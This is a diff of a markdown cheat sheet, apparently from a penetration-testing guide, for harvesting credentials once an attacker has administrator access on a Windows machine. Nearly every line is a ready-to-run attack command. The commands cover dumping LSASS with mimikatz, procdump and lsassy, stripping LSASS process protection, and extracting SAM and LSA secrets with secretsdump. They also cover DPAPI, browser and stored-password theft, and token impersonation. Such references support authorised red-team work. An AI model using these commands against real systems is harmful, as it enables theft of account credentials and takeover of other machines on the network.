--- a/07. Admin access on 1 machine.md
+++ b/07. Admin access on 1 machine.md
@@ -1,59 +1,59 @@
-### Administrator access on 1 machine
-
-
-Extract credentials from LSASS
-		LSASS as a Protected Process
-			PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
-			mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate"  "sekurlsa::logonpasswords" "!processprotect  /process:lsass.exe" "!-" #with mimidriver.sys 
-		procdump.exe -accepteula -ma lsass.exe lsass.dmp
-			mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
-		mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"  "exit"
-		load kiwi
-			creds_all
-		cme smb <ip_range> -u <user> -p <password> -M lsassy
-		🔥lsassy -d <domain> -u <user> -p <password> <ip>
-		
-Extract credentials from SAM
-		cme smb <ip_range> -u <user> -p '<password>' --sam 
-		hashdump
-		reg save HKLM\SAM <file>;  reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file>
-			secretsdump.py  -system SYSTEM -sam SAM LOCAL
-		shadow copies
-			diskshadow list shadows all
-				mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
-		mimikatz "privilege::debug" "lsadump::sam" "exit"
-		🔥secretsdump.py <domain>/<user>:<password>@<ip>
-		reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
-			secretsdump.py -sam <sam_file> -system <system_file> LOCAL
-		
-Extract credentials from LSA
-		cme smb <ip_range> -u <user> -p '<password>' --lsa
-		🔥secretsdump.py <domain>/<user>:<password>@<ip>
-		reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
-			secretsdump.py -security <security_file> -system <system_file> LOCAL
-		
-
-dpapi extract
-		🔥DonPAPI.py <domain>/<user>:<password>@<target>
-		mimikatz.exe "sekurlsa::dpapi"
-		secretsdump.py <domain>/<user>:<passwor>@<ip>
-
-search password files
-		findstr /si 'password' *.txt *.xml *.docx
-
-search stored password 
-		lazagne.exe all
-
-chrome
-		%appdata%\Local\Google\Chrome\User Data\Default
-			SharpChromium.exe
-token manipulation
-		.\incognito.exe list_tokens -u
-			.\incognito.exe execute -c "<domain>\<user>" powershell.exe
-		use incognito
-			impersonate_token <domain>\\<user>
-		Extract credentials with certificate authentication  (ADCS required)
-			masky - d <domain> -u <user>  (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>
-
-
-
+# Administrator access on 1 machine  
+  
+  
+## Extract credentials from LSASS  
+		LSASS as a Protected Process  
+			PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp  
+			mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate"  "sekurlsa::logonpasswords" "!processprotect  /process:lsass.exe" "!-" #with mimidriver.sys   
+		procdump.exe -accepteula -ma lsass.exe lsass.dmp  
+			mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"  
+		mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"  "exit"  
+		load kiwi  
+			creds_all  
+		cme smb <ip_range> -u <user> -p <password> -M lsassy  
+		🔥lsassy -d <domain> -u <user> -p <password> <ip>  
+		  
+## Extract credentials from SAM  
+		cme smb <ip_range> -u <user> -p '<password>' --sam   
+		hashdump  
+		reg save HKLM\SAM <file>;  reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file>  
+			secretsdump.py  -system SYSTEM -sam SAM LOCAL  
+		shadow copies  
+			diskshadow list shadows all  
+				mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\  
+		mimikatz "privilege::debug" "lsadump::sam" "exit"  
+		🔥secretsdump.py <domain>/<user>:<password>@<ip>  
+		reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'  
+			secretsdump.py -sam <sam_file> -system <system_file> LOCAL  
+		  
+## Extract credentials from LSA  
+		cme smb <ip_range> -u <user> -p '<password>' --lsa  
+		🔥secretsdump.py <domain>/<user>:<password>@<ip>  
+		reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'  
+			secretsdump.py -security <security_file> -system <system_file> LOCAL  
+		  
+  
+## dpapi extract  
+		🔥DonPAPI.py <domain>/<user>:<password>@<target>  
+		mimikatz.exe "sekurlsa::dpapi"  
+		secretsdump.py <domain>/<user>:<passwor>@<ip>  
+  
+## search password files  
+		findstr /si 'password' *.txt *.xml *.docx  
+  
+## search stored password   
+		lazagne.exe all  
+  
+## chrome  
+		%appdata%\Local\Google\Chrome\User Data\Default  
+			SharpChromium.exe  
+## token manipulation  
+		.\incognito.exe list_tokens -u  
+			.\incognito.exe execute -c "<domain>\<user>" powershell.exe  
+		use incognito  
+			impersonate_token <domain>\\<user>  
+		Extract credentials with certificate authentication  (ADCS required)  
+			masky - d <domain> -u <user>  (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>  
+  
+  
+  
